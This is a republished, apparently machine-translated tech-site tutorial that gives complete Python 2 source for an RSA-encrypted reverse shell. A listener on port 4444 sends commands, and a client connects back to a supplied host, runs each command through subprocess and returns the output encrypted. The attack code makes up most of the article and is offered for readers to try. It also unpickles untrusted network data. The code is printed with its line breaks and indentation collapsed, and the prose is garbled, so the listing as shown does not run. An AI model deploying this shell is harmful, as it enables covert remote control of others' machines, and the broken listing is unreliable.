Shulou(Shulou.com)06/01 Report--

This article focuses on "how to use RSA encryption to reverse shell in Python", interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn how to use RSA encryption to reverse shell in Python.

Inverse shell in Python using RSA encryption

First, we need a listener to handle all incoming connections. This is listener_rsa.py 's code.

#! / usr/bin/pythonfrom Crypto.PublicKey import RSAfrom Crypto import Randomfrom Crypto.Hash import SHA256import socketfrom thread import * import sysimport pickle#Generate publickey and private keyrandom_generator = Random.new (). Readkey = RSA.generate (2048, random_generator) public_key = key.publickey () # Create socket and bind to accept connectionss = socket.socket (socket.AF_INET, socket.SOCK_STREAM) try: s.bind (("0.0.0.0", 4444) except socket.error, v: print "Binding failed. Error code: "+ str (v [0]) +" Message "+ v [1] sys.exit () print" Socket bind complete "s.listen (2) print" [+] Listening to the incoming connection on port 4444... "def clientthread_sendpublickey (client): client.send (pickle.dumps (public_key)) def clienthandle (client): while True: command = raw_input ('~ $') client.send (command) If command = 'quit': break buf = client.recv (2048) encreply = pickle.loads (buf) print key.decrypt (encreply) while True: (client (ip, port) = s.accept () print "Received connection from:", ipstart_new_thread (clientthread_sendpublickey, (client,)) print "Public Key sent to", ipstart_new_thread (clienthandle, (client,))

I use the PyCrypto module for encryption in Python. Continue to install it. I recommend using pip to install the module.

$sudo pip install pycrypto

Before we get into the code, let me explain to you the RSA encryption and its key. RSA is an asymmetric encryption standard. It has two keys, public and private. Simply put, the public key is used to encrypt the message and the private key is used to decrypt the message. The following is a block diagram describing the process

If you are interested in RSA's math work, then I suggest you read http://mathworld.wolfram.com/RSAEncryption.html (beware, geeks only)

In the above program, you first generate a key, which is also a private key.

Key = RSA.generate (2048, random_generator)

The function RSA.generate takes two arguments, the first is the size of the key in bits, and the second is a random number that is usually generated using the python random function. After the private key is created, the public key is extracted from it and stored in a variable for future use.

Public_key = key.publickey ()

It is relatively simple to create sockets using socket modules. You can refer to the official documentation of Python socket 1 and even do a simple Google search.

The socket binds and waits for the connection to pass in the connection.

Note-if you want to bind a socket in Linux to a port less than 1024, you must execute the script as root.

When a connection is received, initialize a new thread to send the generated public key to the client so that it can encrypt the reply.

Def clientthread_sendpublickey (client): client.send (pickle.dumps (public_key))

Why are we using Pickle? Pickle is used to serialize and deserialize python objects. Because public_key is not a regular string, you must pickle it and then send it to the receiver.

Warning-the pickle module cannot prevent erroneous or maliciously constructed data. Do not cancel data received from untrusted or unauthenticated sources.

Once the public key is sent, another thread clienthandle (client) is initialized to True:loop, which sends a command to the recipient. The receiver runs the command and encrypts the output using the public key. The output pickle is then sent to the listener.

The reply is unpickled, decrypted with the private key and printed on the screen.

Encreply = pickle.loads (buf) print key.decrypt (encreply)

If the 'quit' command is given, the connection is terminated.

Reverse shell

Let's go to the receiver side where the reverse shell is located. The script for reverse_shell_rsa is as follows

#! / usr/bin/pythonimport socket, subprocess, sysfrom Crypto.PublicKey import RSAfrom Crypto.Hash import SHA256import pickleRHOST = sys.argv [1] RPORT = 4444s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) s.connect ((RHOST RPORT)) def receive_key (): data_key = s.recv (1024) return data_keypickled_publickey = receive_key () public_key = pickle.loads (pickled_publickey) while True: command = s.recv (1024) if command = 'quit': break reply = subprocess.Popen (str (command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout, stderr= reply.communicate () en_reply = public_key.encrypt (stdout) 32) s.send (pickle.dumps (en_reply)) s.close ()

As always, import the necessary modules. The IP address to connect to is provided as a parameter and stored in the RHOST variable. Create a socket and establish a connection to the server (listener). Once the connection is accepted, the server sends the public key (scroll up to clientthread_sendpublickey () in the listener.py script), which is received and removed through the function receive_key () (remember pickling? To get the public key

Def receive_key (): data_key = s.recv (1024) return data_keypickled_publickey = receive_key () public_key = pickle.loads (pickled_publickey)

Initialize the True loop for a period of time to keep the connection persistent and receive commands. If the command is "quit", the program ends. Otherwise, the given command runs as a child process and standard output, and the standard error is piped to the variable 'reply'. The standard output is then encrypted with the public key, pickling, and sent to the server.

En_reply = public_key.encrypt (stdout, 32) s.send (pickle.dumps (en_reply))

Then wait patiently until the next order.

At this point, I believe you have a deeper understanding of "how to use RSA encryption to reverse shell in Python". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.